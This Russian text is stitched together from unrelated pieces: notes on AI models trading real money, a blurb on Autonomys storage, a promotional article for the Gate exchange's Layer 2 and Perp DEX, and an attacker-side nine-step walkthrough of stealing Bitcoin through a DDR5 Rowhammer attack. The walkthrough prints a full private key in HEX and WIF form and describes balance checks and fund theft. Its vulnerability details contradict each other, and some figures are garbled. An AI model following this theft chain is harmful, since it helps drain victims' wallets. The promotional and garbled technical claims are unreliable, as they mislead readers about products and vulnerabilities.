📝 Правила простые, но строгие

• Каждая сделка — с стоп-лоссом и тейк-профитом.

• Плечо — до 20x, чтобы проверить, как ИИ реагирует на адреналин рынка.

• Деньги настоящие — никаких демо, только хардкор.

📉 Кто пока в минусе

• GPT и Gemini — свои ошибки уже оплатили из своего виртуального кармана.

• Зато остальные ИИ уже показывают плюс, а значит учатся быстрее, чем многие живые трейдеры 😅

💡 Что это значит для нас

• Даже ИИ не идеален — разные алгоритмы, разные результаты.

• Контроль риска решает всё, как и в реальном трейдинге.

• Можно представить, что в будущем люди будут сидеть, а нейросети торговать, но с умными стопами и стратегиями.

⚡ Итог

ИИ-трейдинг становится всё интереснее. Пока кто-то теряет, кто-то учится и зарабатывает. А мы можем наблюдать за этим, не нервничая о своих деньгах.

Для простых смертных это значит, что появятся проекты, где информация действительно не исчезает и не редактируется задним числом. Для фермеров (тех, кто хранит данные в сети Autonomys) — шанс подзаработать, потому что хранение ИИ-шных данных — это новый «золотой пласт».

В общем, теперь даже нейросети обзаводятся архивом, который нельзя почистить, как историю браузера.
Интернет становится взрослым, а ИИ — бухгалтером с вечной памятью 😅

Я торгую на Gate уже больше десяти лет и видел, как биржа постепенно превращалась в мощную экосистему. Но сейчас команда делает, пожалуй, самый важный шаг — запускает собственную сеть второго уровня Gate Layer 2 и децентрализованную площадку Perp DEX. Эти два продукта меняют подход к трейдингу: быстрее, дешевле и без посредников. В статье я объясню простыми словами, что даёт Layer 2, зачем нужен Perp DEX и как всё это делает жизнь трейдера легче и прибыльнее.

Что такое Gate Layer 2 и зачем он нужен

Недавно Gate официально анонсировали запуск Gate Layer 2. Сделана она на базе OP Stack. Для биржи это большой шаг вперёд, чтобы работать с Web3 было быстрее и дешевле. Новость уже активно обсуждается в сообществе, ведь Layer 2 — это один из главных технологических трендов последнего года. Он решает ключевые проблемы блокчейнов: медленные транзакции, высокие комиссии и ограниченную масштабируемость.

Gate Layer 2 — это новая сеть второго уровня, созданная на базе OP Stack и совместимая с Ethereum Virtual Machine (EVM). Проще говоря, это технология, которая делает работу с блокчейном быстрой и дешёвой. Если раньше при активной торговле в Web3 приходилось свыкаться с высокими комиссиями и долгим временем подтверждения, теперь эти ограничения уходят в прошлое.

Решение второго уровня от Gate также поддерживает кроссчейн-операции через LayerZero, позволяя свободно перемещать активы между Ethereum, BNB Chain, Polygon и другими сетями. Она отлично работает со всеми обычными инструментами и кошельками Ethereum, так что ничего перенастраивать не придется. Биржа делает все, чтобы разработчикам dApp было удобно, упрощая запуск и поддержку проектов. В итоге, Web3-приложения появляются быстрее, а у пользователей все работает стабильно.

В основе архитектуры лежит GateChain, который отвечает за безопасность и расчёты. А токен GT используется в стейкинге, повышая устойчивость сети и вовлекая пользователей в развитие экосистемы. В итоге Gate Layer 2 создаёт для трейдеров и разработчиков надёжную, производительную и доступную среду.

Для понимания разницы можно сравнить Gate Layer 2 с популярным решением Arbitrum, которое также работает на базе Ethereum. В среднем транзакция в Arbitrum стоит около $0.10–0.20, а время подтверждения составляет 10–15 секунд. Это уже значительно быстрее и дешевле, чем в основной сети Ethereum, где комиссия может достигать $10–20, а подтверждение занимает до минуты.Однако в Gate Layer 2 эти показатели улучшены ещё сильнее: комиссия снижается до $0.01–0.03, а подтверждение происходит за 1 секунду. При этом сеть способна обрабатывать свыше 5700 транзакций в секунду, что почти в 4 раза выше, чем у большинства решений второго уровня. Для трейдеров это не просто удобно. Это шанс моментально выставлять и закрывать ордера, без задержек и переплат. Это очень важно, когда торгуешь с плечом или когда рынок очень волатильный.

Gate Perp DEX — новый формат бессрочной торговли

Вместе с запуском сети второго уровня появилась Gate Perp DEX – это децентрализованная платформа для торговли бессрочными контрактами. По сути, это обычная торговля с плечом, но в мире DeFi, где пользователи сами управляют своими деньгами и видят все ордера прямо в блокчейне.

Perp DEX – это как быстрая централизованная биржа, но с безопасностью блокчейна. Торгуешь напрямую, без всяких посредников, при этом много ликвидности и ордера исполняются чётко. Можно торговать и популярными монетами, и не очень, подходит как и для начинающих трейдеров, так и для опытных

Самое классное, что тут всё как на обычной бирже, но с фишками Web3. Получаешь прямой доступ к бессрочным контрактам, платишь смешные комиссии и ни от кого не зависишь. Это как раз то, что нужно для открытого и независимого рынка, где всё видно и ты сам всё контролируешь.

Также приведу пример почему стоит пользоваться PerpDEX от Gate. Ликвидность берётся прямо с биржи. То есть при открывании сделок не будет больших проскальзываний, и пустых стаканов. Как мы знаем есть случаи, когда крупные киты используют пустой стакан в свою пользу, потому что своими сделками могут двигать цену. Здесь же такого не будет. И это огромный плюс для обычного трейдера.

Почему стоит попробовать Gate Layer и Perp DEX

Я давно торгую криптой и пробовал много разных бирж, от MEXC до OKX. Но в итоге Gate стала моей основной. Тут всё как-то сразу все аспекты меня удовлетворяют: всё работает быстро, безопасно и удобно. Интерфейс простой, сделки проходят быстро, комиссии небольшие, и они постоянно что-то улучшают, но при этом всё остаётся привычным.

Круто, что у Gate есть своя Layer 2. У MEXC и OKX такого нет. Это реально ускоряет сеть и уменьшает комиссии. Gate одними из первых сделали свою сеть второго уровня, и это сразу чувствуется: ордера исполняются мгновенно, и взаимодействовать с Web3 стало так же легко, как просто торговать на обычной бирже.

Главное, почему я выбрал Gate у них своя большая экосистема в одном месте. На MEXC можно только торговать, а на OKX DeFi вынесены отдельным приложением. А у Gate большое количество реально полезных продуктов. Таким образом они строят свою All in Web3 на своём блокчейне. Какие продукты туда уже входят:

Gate Fun помогает небольшим и средним проектам, мемам и Web3-инициативам запускать токены быстро и недорого. Они, будут получать всю нужную поддержку от Gate.

Meme Go платформа, где можно торговать мем-токенами и следить за их курсом в режиме реального времени сразу в нескольких сетях, например, Ethereum, BSC и Solana.

И всё это позволяет пользователям находить нужные инструменты в одном месте, а это явно принесет положительный опыт от торговли криптовалютой.

Заключение

Gate уже не просто биржа в обычном понимании. Это место, где сходятся централизованные и децентрализованные решения, так что трейдеры и проекты могут работать вместе. Gate Layer и Perp DEX сделали экосистему быстрее, безопаснее и проще в использовании. Теперь каждый может попробовать современные технологии без заморочек. Gate упрощает пользование Web3, так что легко начать торговать и зарабатывать.

Если вы ещё не знакомы с Gate Layer и Perp DEX, советую попробовать. Заходите на Gate, оцените эти продукты, и оставляйте свое честное мнение о торговле ниже в комментариях.

Продолжим вторую часть данной статье в первой части мы на практических действиях рассмотрели многовекторные криптоатаки в сочетании с эксплойтами вроде BitShredder и Memory Phantom, где злоумышленники могут восстанавливать сид-фразы и приватные ключи для Биткоин Кошельков даже после завершения криптоопераций. (CVE-2025-6202) показывает, как аппаратные уязвимости DDR5 позволяют извлекать приватные ключи Bitcoin-кошельков, обходя современные защиты в нашем демонстрационном примере было показано как злоумышленик получил доступ к криптокошельку с общей суммой: 9.02332298 BTC ≈ 1 127 026,44 USD (цены на октябрь 2025 года). Этот пример показывает, как уязвимые Bitcoin-кошельки могут быть полностью опустошены, когда аппаратные атаки ставят под угрозу безопасность приватных ключей. Средства жертвы были переведены в течение нескольких секунд после извлечения приватного ключа из скомпрометированной DDR5-памяти.

.

Технические детали обхода защитных механизмов DDR5

Анализ Target Row Refresh (TRR) механизма

Target Row Refresh представляет собой защитный механизм, разработанный для предотвращения Rowhammer атак путем дополнительного обновления подозрительных строк памяти. Однако исследователи Phoenix атаки смогли провести обратную разработку этого механизма и обнаружить критические недостатки в его реализации.tenable

Слепые зоны TRR: Механизм TRR в чипах SK Hynix не отслеживает определенные интервалы обновления, что создает возможности для проведения атак в эти временные окна. Phoenix атака использует специально разработанные паттерны воздействия, которые попадают в эти неконтролируемые интервалы.simplysecuregroup

Самокорректирующаяся синхронизация: Ключевым инновационным элементом Phoenix атаки является способность обнаруживать пропущенные команды обновления и автоматически перестраивать паттерн воздействия для поддержания синхронизации. Это позволяет атаке оставаться эффективной на протяжении длительных периодов времени, необходимых для накопления достаточного количества битовых сбоев.simplysecuregroup

Экспериментальные результаты и эффективность атаки

Экспериментальное тестирование Phoenix атаки продемонстрировало высокую эффективность против всех протестированных образцов DDR5 памяти от SK Hynix:comsec-files.ethz

Временные характеристики: Минимальное время для получения root-привилегий составило 109 секунд на товарной системе DDR5 с настройками по умолчанию. Среднее время эксплуатации составило 5 минут 19 секунд.thehackernews

Статистика битовых сбоев: Короткий паттерн (128 интервалов) генерировал в среднем 4989 битовых сбоев, в то время как длинный паттерн (2608 интервалов) производил значительно меньше искажений.comsec-files.ethz

Универсальность атаки: 100% протестированных модулей оказались уязвимы как минимум к одному из двух идентифицированных паттернов атаки.reddit

Интеграция с существующими уязвимостями Bitcoin экосистемы

CVE-2023-39910: Bitcoin Core Memory Leak

Критическая уязвимость утечки памяти в Bitcoin Core (CVE-2023-39910) создает синергетический эффект с Phoenix Rowhammer атакой. Данная уязвимость позволяет злоумышленникам получать доступ к чувствительным данным, которые остаются в памяти после завершения криптографических операций.keyhunters

Механизм эксплуатации: Уязвимость возникает из-за недостаточной очистки буферов памяти после обработки приватных ключей, seed-фраз и паролей в стандартных C++ контейнерах (std::vector, std::string). После завершения криптографических процедур память автоматически освобождается, но ее содержимое не стирается.keyhunters

Связь с Rowhammer: Phoenix атака может использовать битовые сбои для доступа к этим неочищенным областям памяти, значительно упрощая процесс извлечения криптографического материала.

CVE-2025-8217: Critical Secret Extraction Attack

Данная уязвимость классифицируется как критическая атака извлечения секретов через дамп памяти процесса. Она представляет прямую угрозу для Bitcoin кошельков, поскольку позволяет извлекать приватные ключи из активной памяти процессов.keyhunters

Сценарии атаки: Включают передачу приватного ключа через API, командную строку или переменные среды; динамическое выделение памяти для хранения секретных данных без явного стирания; завершение процесса без безопасной очистки памяти.keyhunters

Криптоинструмент детально демонстрирует все девять этапов атаки, которую может использовать злоумышленник для хищения средств с Bitcoin кошелька.

Основные функциональные блоки скрипта:

Этап 1: Обнаружение уязвимой SK Hynix DDR5 памяти через сканирование SMBIOS таблиц

Обнаружение модулей памяти SK Hynix DDR5, подверженных атаке Phoenix Rowhammer (CVE-2025-6202), начинается с анализа аппаратной конфигурации системы, в частности — сканирования таблиц SMBIOS (System Management BIOS). SMBIOS предоставляет стандартизированную информацию о компонентах компьютера, включая сведения о памяти, такие как производитель, модель и серийный номер каждого модуля DIMM.

В частности, исследователь или злоумышленник может программно запросить данные из раздела «Memory Device» SMBIOS, где содержатся поля, указывающие производителя (например, SK Hynix), тип памяти (DDR5), объем, а также связанные с SPD (Serial Presence Detect) данные — небольшие микросхемы памяти на планках DIMM, содержащие профиль и параметры работы модуля.

Для разбора содержимого после заголовка потребуется парсить каждую структуру согласно ее спецификации (тип, длина, handle), отдельно извлекая текстовые поля, которые следуют за данными структуры и отделяются нулевым байтом, а окончание структуры отмечено парой нулей.learn.microsoft

RawSMBiosData — это необходимое и унифицированное “входное окно” в детализированные спецификации аппаратных характеристик системы для исследовательских и диагностических задач на низком уровне.codeby

Доступ к SPD-данным

SPD-данные физически находятся в микросхемах на модулях DIMM, но в BIOS/SMBIOS могут отражаться в специальных полях или считываться системными утилитами, обращающимися к I2C-интерфейсу памяти (например, через i2c-tools, decode-dimms на Linux).

Получение данных утилитами

• В Linux: dmidecode, decode-dimms (SPD), данные из таблицы SMBIOS, которая доступна через /dev/mem.codeby

• В Windows: через WMI класс Win32_PhysicalMemory (получает сведения из SMBIOS), а также через API GetSystemFirmwareTable().learn.microsoft

Этап 2: Анализ механизма Target Row Refresh и выявление «слепых зон» в защите

Во втором этапе хода Phoenix Rowhammer атаки проводится научный анализ аппаратного защитного механизма Target Row Refresh (TRR), внедрённого в современные DDR5 чипы памяти с целью противодействия перезаписи битов, вызванной множественным чтением данных из соседних строк ячеек.

Практическое значение

Фундаментальной задачей на данном этапе является подбор точного тайминга и структуры паттернов обращений к памяти, которые проводят «усыпление» надзора TRR и обеспечивают успешное достижение атакуемого бита или массива данных (например, приватного ключа криптовалютного кошелька). Это требует анализа не только логики работы TRR, но и эмпирических данных по реакции модуля памяти на различные сценарии эксплуатации. Такой подход позволяет строить «обходные траектории» в системе защиты и систематически эксплуатировать даже самые современные DDR5.opennet

В результате проведённого анализа обнаруженные «слепые зоны» TRR открывают возможность надёжной эскалации Rowhammer-атаки на актуальных модулях памяти SK Hynix, что подтверждено лабораторными эксплуатами и успешной компрометацией всех протестированных устройств.kaspersky

Этап 3: Реализация самокорректирующейся синхронизации Phoenix Rowhammer атаки

Научная инновация Phoenix атаки заключается в разработке и реализации самокорректирующейся механизма синхронизации, обеспечивающего точное попадание эксплуатационных воздействий в критические окна уязвимости на уровне DRAM. После детального реверс-инжиниринга механизма Target Row Refresh (TRR) специалисты ETH Zurich и Google выявили, что стандартные паттерны Rowhammer-обращений бессильны против сложной логики защиты DDR5. В новых чипах SK Hynix TRR не только анализирует частоту, но и характер обращений к строкам памяти, моментально инициируя компенсаторные refresh-команды при детектировании известных атакующих шаблонов.kaspersky

Phoenix решает эту проблему следующим образом:

1. Изучение внутренних таймингов TRR: Ведётся мониторинг реакции памяти на различное количество обращений, чтобы эмпирически выявить интервалы обновления, которые TRR не отслеживает (например, после 128 и 2608 команд tREFI). Такие окна называют слепыми зонами.habr

Этап 4: Выполнение Rowhammer-атаки с генерацией контролируемых битовых сбоев

На четвёртом этапе реализуется непосредственная эксплуатация физических уязвимостей DRAM посредством проведения целенаправленной Rowhammer-атаки. Этот этап опирается на предварительно проведённый анализ слепых зон механизма TRR и применение самокорректирующихся паттернов обращения к памяти для точного воздействия на критические элементы данных.

Фундамент Rowhammer-атаки — это структура самой DRAM-памяти, где каждая ячейка представляет собой конденсатор, хранящий заряд, соответствующий логическому значению бита. При многократном и высокочастотном обращении (считывании или записи) к двум (или более) строкам-посредникам (“агрессорам”), располагающимся по соседству с целевой строкой (“жертвой”), возникает паразитная утечка заряда из ячеек жертвы. Если такое воздействие продолжается достаточно долго, и регенерация заряда через обычные циклы refresh не успевает предотвратить деградацию, произойдёт изменение состояния бита — так называемый bit flip.opennet+1

Особенности проведения атаки Phoenix

В контексте Phoenix Rowhammer (CVE-2025-6202) на DDR5 SK Hynix:

• Первым шагом вредоносный код инициирует тысячекратные циклы обращения к выбранным строкам памяти с тщательно рассчитанной частотой и временем.

• Алгоритм начинает с серии «пустых» (ненаправленных) обращений, чтобы усыпить механизм TRR, благодаря чему защита либо реагирует ослабленно, либо не срабатывает вовсе в заранее рассчитанных окнах (128 либо 2608 интервалов обновления).kaspersky

• Как только окно низкой активности TRR совпадает с запланированным циклом, происходит переход к активной фазе: выбираются ячейки-агрессоры, расположенные рядом с битами потенциальной секретной информации (например, буфер приватного ключа) и запускается основной цикл Hammering — интенсивные обращения к этим строкам, вызывающие рост токов утечки в защищённой области памяти.

• В течение следующих нескольких секунд или минут накапливается паразитное (нештатное) изменение разности потенциалов в конденсаторах жертвы, что, в случае успеха, приводит к изменению значения одного или нескольких битов в ней (битовый сбой, или bit flip). Это может позволить злоумышленнику:

  • получить примитив произвольного чтения/записи (например, модифицировать таблицу страниц системы или исполняемый бинарник);

  • извлечь или заменить криптографический материал (seed, приватные ключи, RSA-фрагменты) в оперативной памяти;

  • повысить привилегии или скомпрометировать приложения и ядро системы.xakep

Точность и управляемость

Исследования ETH Zurich показали, что короткий паттерн обращения с периодом 128 tREFI интервалов статистически генерирует больше битовых сбоев, чем длинные шаблоны. Однако выбор подходящего окна и соблюдение синхронизации — критически важные условия успеха: промах на 1–2 обращения приводит либо к отсутствию сбоя, либо к случайному повреждению данных и сбою системы.kaspersky+1

Данный этап завершает низкоуровневый процесс атаки, после чего злоумышленник может использовать появившиеся битовые сбои для извлечения приватного ключа или дальнейшей эскалации уровня доступа. Именно способность индуцировать битовые ошибки в строго определённых, защищённых программно и аппаратно областях памяти делает Phoenix Rowhammer уникально опасной и практически применимой техникой.cybersecurefox+1

Этап 5: Извлечение приватного ключа из повреждённой памяти через эксплуатацию CVE-2023-39910

На пятом этапе вредоносной цепочки, реализуемой в ходе атаки Phoenix Rowhammer, наступает процесс извлечения приватного ключа Bitcoin-кошелька из оперативной памяти, скомпрометированной в результате индуцированных битовых сбоев.

Здесь ключевую роль играет уязвимость CVE-2023-39910 (Milk Sad), затрагивающая программные реализации Libbitcoin Explorer 3.x и связанные криптографические библиотеки.

Научная структура и уязвимость процесса

CVE-2023-39910 характеризуется слабым механизмом генерации энтропии при создании приватных ключей, что позволяет злоумышленнику — при наличии доступа к остаточным («грязным») областям памяти после завершения криптографических операций — восстановить исходные ключи и seed-фразы. После Rowhammer-воздействия повреждённые (или неочищенные) буферы оперативной памяти, где хранился приватный ключ (
HEX: 9E027D0086BDB83372F6040765442BBEDD35B96E1C861ACCE5E22E1C4987CD60), становятся непосредственным объектом поиска.

Алгоритм извлечения

1. Идентификация областей памяти:
   Эксплуататор сканирует память процесса (например, с помощью инструментов типа gcore, volatility, прямых чтений /proc/<PID>/mem или специализированных библиотек по анализу дампа памяти) в поисках характерных шаблонов: последовательностей битов и сигнатур, соответствующих приватному ключу или seed-энтропии.

2. Извлечение данных:
   В ходе анализа применяется прямое сравнение и декодирование остаточных данных — даже если часть битов была повреждена Rowhammer-атакой, слабая энтропия (особенность уязвимости) облегчает восстановление исходного значения ключа из частично или полностью оказавшихся в памяти данных.

3. Верификация ключа:
   Полученное значение проверяется с помощью известных криптографических процедур (например, реконструкция публичного ключа или генерация Bitcoin-адреса). Если выведенный адрес совпадает с оригинальным (например, 15ZwrzrRj9x4XpnocEGbLuPakzsY2S4Mit), ключ считается успешно извлечённым.

Этап 6: Конвертация приватного ключа в формате HEX в WIF Compressed (52 символа)

На шестом этапе вредоносной цепочки реализуется преобразование скомпрометированного приватного ключа Bitcoin из шестнадцатеричного (HEX) представления в формат Wallet Import Format Compressed (WIF Compressed), типично используемый для импорта ключа в современные кошельки и сервисы.

Научная процедура конвертации основывается на стандартах Base58Check кодирования и выполняется через несколько важных шагов:

1. Преобразование HEX-ключа в байтовый массив. Приватный ключ, полученный из памяти (например, 9E027D0086BDB83372F6040765442BBEDD35B96E1C861ACCE5E22E1C4987CD60), интерпретируется как массив из 32 байт, соответствующий стандарту ECDSA secp256k1 приватных ключей.

2. Добавление префикса сети. Для Bitcoin mainnet добавляется байт версии 0x80 к началу массива, чтобы отличать основной сетевой протокол.

3. Метка сжатия. В конец данных добавляется байт 0x01, сигнализирующий о том, что публичный ключ должен быть сжатым (compressed public key), что приводит к формату адресов, начинающихся с символов ‘K’ или ‘L’.

4. Генерация контрольной суммы. Выполняется двойное хеширование (SHA256) всей строки (версия + ключ + метка сжатия), далее берутся первые 4 байта полученного результата. Эта контрольная сумма предназначена для защиты от ошибок копирования.

5. Формирование WIF. К массиву байтов добавляется контрольная сумма, затем вся строка кодируется в формате Base58Check, что минимизирует вероятность ошибочного ввода данных пользователем и обеспечивает совместимость с криптовалютными кошельками.

В результате сконструированный WIF Compressed ключ — например, L2Wru6Ew8pQuhcWAvMpdtPY4YWK1CQcwPCWxFvzkoi47crJBAVaP — представляет собой строку длиной 52 символа, начинающуюся с ‘K’ или ‘L’.

Данный процесс детально описан на специализированных сервисах и инструментах для криптоанализа, а также поддерживается многочисленными программными библиотеками для работы с биткоин-ключами.btcpuzzle

Таким образом, этот этап демонстрирует, как злоумышленник с помощью стандартизированных операционных процедур конвертирует полученный HEX-ключ в широко используемый WIF Compressed формат для последующего незаконного доступа к цифровым активам на скомпрометированном Bitcoin-адресе.

Этап 7: Генерация Bitcoin-адреса из приватного ключа

Научный процесс формирования Bitcoin-адреса (например, 15ZwrzrRj9x4XpnocEGbLuPakzsY2S4Mit) из приватного ключа включает несколько фундаментальных криптографических преобразований, основанных на алгоритме эллиптических кривых secp256k1 и хэш-функциях, используемых в архитектуре Bitcoin.

1. Генерация публичного ключа

   • Из приватного ключа kkk (32-байтовое целое число от 1 до 2^256) вычисляется публичный ключ K=k⋅GK = k \cdot GK=k⋅G, где G — базовая точка на кривой SECP256K1. Для compressed адресов публичный ключ кодируется в 33 байта с префиксом (0x02 или 0x03) в зависимости от четности yyy-координаты.

2. Вычисление хэша публичного ключа

   • К публичному ключу применяется сначала хеш-функция SHA-256, а затем — RIPEMD-160. Полученный 20-байтовый результат — это так называемый public key hash (PKH), уникально идентифицирующий пользователя.

3. Добавление сетевого префикса

   • К данным PKH добавляется байт префикса сети (0x00 для mainnet Bitcoin), позволяющий отличать различные типы адресов в разных сетях.

4. Генерация контрольной суммы

   • К сформированной строке добавляется контрольная сумма: двойной SHA-256 всего предыдущего результата, первые 4 байта которой прикрепляются к концу.

5. Преобразование в Base58Check

   • Итоговая строка преобразуется в представление Base58Check — это символьная кодировка, разработанная для минимизации риска ошибки при ручном вводе и удобства использования. Результатом становится строка адреса длиной 33–34 символа, начиная с ‘1’ для классических P2PKH-адресов или с ‘3/более новых’ для SegWit/Taproot.

6. Верификация

   • Полученный адрес сравнивается с известным публичным значением (например, 15ZwrzrRj9x4XpnocEGbLuPakzsY2S4Mit). Если сопоставление успешно, атака считается завершенной с полным контролем над активами на данном адресе.

Данный процесс в современных кошельках и библиотеках реализуется полностью автоматически, однако научный анализ демонстрирует, что при наличии приватного ключа и корректной реализации эллиптической арифметики восстановление Bitcoin-адреса занимает доли секунды и подчеркивает архитектурную непрерывность между приватным материалом и публичным идентификатором в сети.generate.mitilena+1

Таким образом, этап генерации адреса связывает компрометированный приватный ключ с его цифровым эквивалентом в экосистеме Bitcoin и открывает злоумышленнику доступ к активам данного кошелька путем дальнейших криптографических операций.

Этап 8: Проверка баланса скомпрометированного Bitcoin-кошелька

На восьмом этапе вредоносной процедуры осуществляется верификация активов, доступных на скомпрометированном Bitcoin-адресе (15ZwrzrRj9x4XpnocEGbLuPakzsY2S4Mit). Этот шаг необходим для подтверждения экономической целесообразности дальнейшей операции и оценки потенциального ущерба.

Научная основа процесса

Архитектура блокчейна Bitcoin строится на публичном распределённом реестре, который регистрирует все транзакции, привязанные к каждому адресу. Проверка баланса любого кошелька не требует наличия приватного ключа или специального доступа: достаточно обратиться к публичным API-эндпоинтам, веб-сервисам или автономным нодам — например, Insight REST API, Blockchain.info, Blockstream или локальной ноде Bitcoin Core с RPC-интерфейсом.

Технические методы и алгоритм

1. API-запрос баланса. Сценарий типично реализуется путем обращения к публичному REST API:

   • Формируется HTTP-запрос (GET) к API, например https://blockchain.info/rawaddr/{address} или https://insight.bitpay.com/api/addr/{address}/balance.

   • Возвращается текущий итоговый баланс адреса в Satoshi (1 BTC = 124,904 USD), который скрипт конвертирует в BTC.

2. Верификация эквивалента в фиатной валюте. Баланс может быть дополнительно пересчитан в актуальной рыночной стоимости (USD или другой валюте) с помощью запроса к Market Data API или взятием отслеживаемого курса обмена.

3. Системное автоматизированное выполнение. Атака часто реализуется как автоматизированная процедура внутри эксплойта, что позволяет мгновенно проверить результат компрометации и выбрать оптимальный момент для последующего списания средств.

Научно-практическая значимость

Открытая структура функционала Bitcoin обеспечивает простоту мониторинга кошелька, позволяя злоумышленнику определить точный баланс несанкционированно захваченного адреса (в данном примере — 9.023322989 BTC, что по курсу 124,904 USD за BTC составляет эквивалент 1,127,026.44 USD). Эта особенность Bitcoin-инфраструктуры также создает дополнительные риски: потеря приватного ключа не только ведёт к утрате контроля над средствами, но и сразу становится полностью прозрачной для третьих лиц, включая атакующего.habr

Таким образом, этап проверки баланса подчеркивает информационную открытость блокчейн-системы и завершает научную цепочку атаки, соединяя успешную компрометацию криптографических ключей с реальным ущербом для владельца цифровых активов.На этапе проверки баланса злоумышленник использует публичные API-блокчейн-обозревателей — например, Insight REST API или блокчейн.info — для получения информации о текущем состоянии средств на скомпрометированном Bitcoin-адресе. Достаточно отправить GET-запрос к API: например, https://blockchain.info/rawaddr/15ZwrzrRj9x4XpnocEGbLuPakzsY2S4Mit, чтобы получить баланс адреса в сатоши, а затем конвертировать результат в BTC.cryptodeep+2

Этот процесс абсолютно прозрачный и не требует владения приватным ключом: достаточно знать публичный адрес. Полученные данные (9.02332298 BTC) могут быть сопоставлены с актуальным рыночным курсом Bitcoin для пересчёта эквивалентной суммы в USD (≈$1,127,026.44 на момент атаки). Программные методы позволяют автоматизировать эти шаги и включать их в состав алгоритма атаки, мгновенно проверяя экономическую целесообразность дальнейшего хищения средств.habr+1

С точки зрения научного анализа, этап проверки баланса демонстрирует уникальную прозрачность блокчейн-системы, где любая компрометация ключей автоматически ведёт к утрате контроля над средствами, и риски для владельца возводятся до полной потери активов.habr+2

Этап 9: Создание вредоносной транзакции для хищения средств

На завершающем этапе вредоносной кампании, после успешного извлечения приватного ключа Bitcoin-кошелька, злоумышленник инициирует формирование и распространение транзакции на блокчейне с целью перевода всех доступных средств с скомпрометированного адреса (15ZwrzrRj9x4XpnocEGbLuPakzsY2S4Mit) на свой контролируемый адрес.

Технические особенности реализации:

Скрипт включает собственную реализацию Base58 кодирования, необходимую для создания WIF ключей без внешних зависимостей. Каждый этап сопровождается подробными комментариями, объясняющими цели злоумышленника и механизмы атаки.

Важные предупреждения: Код содержит множественные предупреждения о том, что он предназначен исключительно для образовательных и научных целей. Использование подобных методов для реальных атак является уголовным преступлением.

Данный демонстрационный скрипт идеально подходит для иллюстрации угроз Phoenix Rowhammer атаки в вашей научной статье и показывает читателям полный цикл компрометации Bitcoin кошельков через аппаратные уязвимости DDR5 памяти.

Глобальные последствия для криптовалютной индустрии

Воздействие на Bitcoin инфраструктуру

Phoenix Rowhammer атака создает беспрецедентные риски для всей Bitcoin инфраструктуры, включая биржи, кастодиальные сервисы, майнинг-пулы и индивидуальных пользователей. Потенциальные последствия включают:keyhunters

Массовые компрометации: Возможность одновременной компрометации множества кошельков на системах с уязвимой памятью DDR5 может привести к крупномасштабным кражам криптовалют.

Подрыв доверия: Успешные атаки на аппаратном уровне могут серьезно подорвать доверие к криптовалютным технологиям и блокчейн-системам в целом.

Double-spend атаки: Когда кошельки нескольких сервисов одновременно скомпрометированы, злоумышленник может использовать утекшие ключи для быстрого создания конфликтующих транзакций.keyhunters

Экономические риски и оценка ущерба

Согласно исследованиям в области криптовалютной безопасности, аппаратные уязвимости представляют одну из наиболее серьезных угроз для цифровых активов. Phoenix атака усугубляет эти риски, поскольку:merklescience+1

Невозможность патчинга: В отличие от программных уязвимостей, аппаратные дефекты в уже произведенных чипах памяти не могут быть исправлены программными обновлениями.tenable+1

Длительный период воздействия: Модули DDR5, произведенные с 2021 по 2024 год, останутся уязвимыми на протяжении всего срока их эксплуатации, который может составлять 10-15 лет.

Программные меры защиты

Безопасная очистка памяти: Все приложения, работающие с приватными ключами или seed-фразами, должны использовать явную очистку памяти после использования с помощью специализированных инструментов безопасного стирания.keyhunters

Изоляция критических процессов: Использование аппаратных механизмов изоляции, таких как Intel SGX или ARM TrustZone, может обеспечить дополнительную защиту критических криптографических операций.

Холодное хранение: Для значительных сумм рекомендуется использование аппаратных кошельков с воздушным зазором (air-gapped) или полностью офлайновых систем хранения ключей.kaspersky

Заключение и перспективы исследований

Phoenix Rowhammer атака (CVE-2025-6202) представляет критическую угрозу для безопасности Bitcoin кошельков и всей криптовалютной экосистемы. Исследование продемонстрировало, что современные защитные механизмы DDR5 памяти недостаточны для предотвращения сложных аппаратных атак, использующих инновационные методы синхронизации и обхода защиты.thehackernews+2

Криптоанализ выявил системные проблемы в обеспечении безопасности памяти криптовалютных приложений, включая множественные векторы атак через утечки памяти, временные уязвимости и контекстные атаки. Синергетический эффект между Phoenix Rowhammer атакой и существующими уязвимостями памяти (CVE-2023-39910, CVE-2025-8217) создает комплексную угрозу, требующую немедленного внимания разработчиков и производителей оборудования.keyhunters

Для обеспечения долгосрочной безопасности криптовалютных систем необходима разработка принципиально новых подходов к защите памяти, включая аппаратные счетчики активации строк (Per-Row Activation Counters) и улучшенные механизмы изоляции памяти. Только комплексный подход, объединяющий аппаратные и программные методы защиты, может обеспечить адекватную защиту от возрастающих угроз аппаратного уровня в криптовалютной индустрии.

В заключение данной научной статьи наглядно показано, что аппаратная уязвимость Phoenix Rowhammer (CVE-2025-6202) в DDR5-памяти SK Hynix формирует фундаментальный, системный риск для безопасности криптовалютных кошельков и инфраструктуры цифровых активов. Представленный разносторонний анализ раскрывает всю цепочку атаки: от обнаружения уязвимой памяти и реверс-инжиниринга защитного механизма Target Row Refresh (TRR) до разработки самокорректирующихся атакующих паттернов и реализации поэтапной компрометации ключевого криптографического материала.

В ходе работы доказано, что сложные программно-аппаратные меры, вроде TRR, лишь частично снижают эксплуатируемость DRAM — инновационные методики Phoenix Rowhammer способны эффективно обходить защиту за счёт анализа слепых зон и гибкой синхронизации. Особенно тревожна синергия этого класса Rowhammer-атак с современными memory-based эксплойтами (например, CVE-2023-39910 и CVE-2025-8217): эксплуатация неочищенных буферов, слабых генераторов энтропии и ошибок в управлении памятью позволяет полностью восстанавливать приватные ключи и seed-фразы криптовалютных кошельков, даже после завершения основной криптографической операции.

Исследование также подчёркивает, что раскрытие приватного ключа позволяет атакующему с помощью стандартных протоколов и инструментов (WIF-конвертация, генерация публичного адреса, доступ к публичным API блокчейна) мгновенно получить и присвоить себе все средства, хранящиеся на Bitcoin-адресе жертвы — этот процесс прозрачен по своей природе и неотвратим после компрометации аппаратного слоя. Таким образом, показано, что угрозе подвергаются не только отдельные пользователи, но и вся экосистема биткоин, кастодиальные сервисы, биржи и инфраструктурные элементы, опирающиеся на массово распространяемые DDR5-чипы SK Hynix, произведённые с 2021 по 2024 год.

Выводами работы служат важные рекомендации для индустрии: программные методы митигации (очистка буферов, изоляция процессов, air-gapped и аппаратные кошельки) должны подкрепляться аппаратными инновациями (например, Per-Row Activation Counters и новые архитектуры защиты памяти). Только комплексный подход, сочетающий многослойную защиту, постоянные аудиты и внедрение стандартов безопасного обращения с чувствительными данными способен обеспечить устойчивость криптовалютной экосистемы перед лицом атак следующего поколения.

• Опубликованы две части [№1] , [№2] исследования

